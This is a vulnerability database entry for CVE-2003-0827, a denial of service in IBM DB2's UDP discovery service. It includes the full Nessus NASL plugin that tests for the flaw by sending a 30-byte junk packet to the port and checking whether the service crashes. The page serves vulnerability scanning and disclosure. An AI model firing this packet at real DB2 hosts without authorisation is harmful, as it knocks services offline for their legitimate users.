Vulnerabilities > CVE-2003-0827 - Unspecified vulnerability in IBM DB2 Universal Database 7.1/7.2

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
ibm
nessus

Summary

The DB2 Discovery Service for IBM DB2 before FixPak 10a allows remote attackers to cause a denial of service (crash) via a long packet to UDP port 523.

Vulnerable Configurations

Part Description Count
Application
Ibm
2

Nessus

NASL familyDatabases
NASL idDB2_DISCOVERY_DOS.NASL
descriptionIt was possible to crash the IBM DB2 UDP-based discovery listener on the remote host by sending it a packet with more than 20 bytes. An unauthenticated attacker can use this attack to make this service crash continuously, thereby denying service to legitimate users.
last seen2020-06-01
modified2020-06-02
plugin id11896
published2003-10-17
reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11896
titleIBM DB2 Discovery Service Malformed UDP Packet Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#
#
# References:
# Date: Thu, 18 Sep 2003 20:17:36 -0400
# From: "Aaron C. Newman" <[email protected]>
# Subject: AppSecInc Security Alert: Denial of Service Vulnerability in DB2 Discovery Service
# To: [email protected]
#

include("compat.inc");

if (description)
{
 script_id(11896);
 script_version("1.26");
 script_cvs_date("Date: 2018/11/15 20:50:21");

 script_cve_id("CVE-2003-0827");
 script_bugtraq_id(8653);

 script_name(english:"IBM DB2 Discovery Service Malformed UDP Packet Remote DoS");
 script_summary(english:"A large UDP packet kills the remote service.");

 script_set_attribute(attribute:"synopsis", value:
"The remote service is affected by a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"It was possible to crash the IBM DB2 UDP-based discovery listener on
the remote host by sending it a packet with more than 20 bytes. An
unauthenticated attacker can use this attack to make this service
crash continuously, thereby denying service to legitimate users.");
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/338234/30/0/threaded");
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8d0c33a1");
 script_set_attribute(attribute:"solution", value:"Apply IBM Fix Pack 10a or later.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"2003/09/19");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/10/17");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:db2");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"Databases");

 script_dependencies("db2_discovery_detect.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_udp_ports("Services/udp/db2_ds");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("network_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_kb_item("Services/udp/db2_ds");
if (! port || ! get_udp_port_state(port)) exit(0, "DB2 DS is not running.");

# There is probably a clean way to do it and change this script to
# an ACT_GATHER_INFO or ACT_MIXED...

if (! test_udp_port(port: port)) exit(0);

s = open_sock_udp(port);
if (! s) exit(0);
send(socket: s, data: crap(30));
close(s);

if (! test_udp_port(port: port)) security_warning(port:port, proto:"udp");